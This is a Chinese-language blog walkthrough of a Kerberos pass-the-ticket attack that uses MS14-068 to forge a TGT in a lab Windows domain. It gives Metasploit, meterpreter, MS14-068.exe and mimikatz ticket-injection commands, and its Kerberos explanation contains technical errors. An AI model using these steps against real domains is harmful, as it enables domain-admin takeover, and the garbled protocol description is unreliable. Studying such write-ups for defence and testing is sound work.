域滲透之票據傳遞攻擊(pass the ticket,ptt)

票據傳遞攻擊(PtT)是一種使用Kerberos票據代替明文密碼或NTLM哈希的方法。PtT最多見的用途多是使用黃金票據和白銀票據,經過PtT訪問主機至關簡單。

1.ptt攻擊的部分

就不是簡單的NTLM認證了,它是利用Kerberos協議進行攻擊的linux

以前介紹了Kerberos協議具體工做方法:Kerberos認證方式,在域中,簡要介紹一下:windows

  • 客戶機將明文密碼進行NTLM哈希,而後和時間戳一塊兒加密(使用krbtgt密碼hash做爲密鑰),發送給kdc(域控),kdc對用戶進行檢測,成功以後建立TGT(Ticket-Granting Ticket)
  • 將TGT進行加密簽名返回給客戶機器,只有域用戶krbtgt才能讀取kerberos中TGT數據
  • 而後客戶機將TGT發送給域控制器KDC請求TGS(票證受權服務)票證,而且對TGT進行檢測
  • 檢測成功以後,將目標服務帳戶的NTLM以及TGT進行加密,將加密後的結果返回給客戶機。

1.1 ms14-068

MS14-068是密鑰分發中心(KDC)服務中的Windows漏洞。它容許通過身份驗證的用戶在其Kerberos票證(TGT)中插入任意PAC(表示全部用戶權限的結構)。該漏洞位於kdcsvc.dll域控制器的密鑰分發中心(KDC)中。用戶能夠經過呈現具備改變的PAC的Kerberos TGT來得到票證.
在msf裏也集成了ms14-068的利用操做
要想使用咱們首先得:
1.域用戶sid和域控主機名,
 
2.目標域名稱
3.當前域用戶帳戶和密碼

 

 

而後再msf下
msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

注意:這裏的rhost設置成你想要假冒的域的主機名,通常是域控主機名
而後找到生成的文件,TGT憑單(具備特權PAC信息)已保存在中
這種格式很是有用,由於能夠經過Mimikatz在Windows客戶端上或在linux客戶端上使用MIT kerberos導入
同時,可使用mimikatz轉換格式(任何mimikatz安裝均可以完成工做,而無需成爲域計算機或相似的東西):
注意:mimikatz不支持注入xp以及如下系統
在kail系統下尚未默認安裝kerberos的認證功能因此咱們首先要安裝一個kerberos客戶端:
apt-get install krb5-user
而後在目標靶機上傳mimikatz和生成的bin文件,將咱們生成的bin文件轉換爲.kirbi文件,而後再在經過kiwi meterpreter擴展名加載。首先須要在域計算機上進行會話,而後使用kiwi擴展名導入TGT票證:
上傳mimikatz:
上傳bin文件:
 
mimikatz:
 
ok,導出的文件0-00000000-zhu1@krbtgt-XIAN.COM.kirbi如今能夠用於kiwi meterpreter擴展名加載。首先須要在域計算機上進行會話,而後使用kiwi擴展名導入TGT票證:
返回到meterpreter,注意這裏必需要有管理員權限才行。
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
運行load kiwi

 

將生成的kirbi下載回來到本地/tmp/文件夾內:(由於我kali上的kerberos安裝有問題...)
download c:/wmpub/0-00000000-zhu1@krbtgt-XIAN.COM.kirbi /tmp/

 

最後注入票據:
 
最後一步老是失敗,多是msf上mimikatz對windows2003的支持問題,下次在win7上試一下。
 

1.2 使用ms14-068.exe

除了使用msf配合mimikatz,還可使用ms14-068.exe,全程在目標機上完成注入

1.2.1 使用whoami/user獲得域用戶的sid

1.2.2 執行payload生成TGT票據

    使用工具:ms14-068
    使用方法:
ms14-068.exe -u 域成員名@域名 -s 域成員sid -d 域控制器地址 -p 域成員密碼
        運行:
MS14-068.exe -u xian.com -s S-1-5-21-3472572548-430068626-1276128607-1106 -d 192.168.5.2 -p xxx
若是操做正確,且域機器是能夠和域控制器互通則會建立.ccache文件
當前目錄下生成僞造的票據文件:

1.2.3 票據注入

     使用mimikatz將票據注入到當前內存中,僞造憑證,若是成功則擁有域管理權限,可任意訪問域中全部機器
        mimikatz # kerberos::purge //清空當前機器中全部憑證,若是有域成員憑證會影響憑證僞造 
        mimikatz # kerberos::list //查看當前機器憑證 
        mimikatz # kerberos::ptc 票據文件 //將票據注入到內存中

 

 

顯示錯誤
通過上面實驗,和網上資料,域成員主機若是爲windows xp或windows server 2003,是沒法正常僞造票據的
相關文章
相關標籤/搜索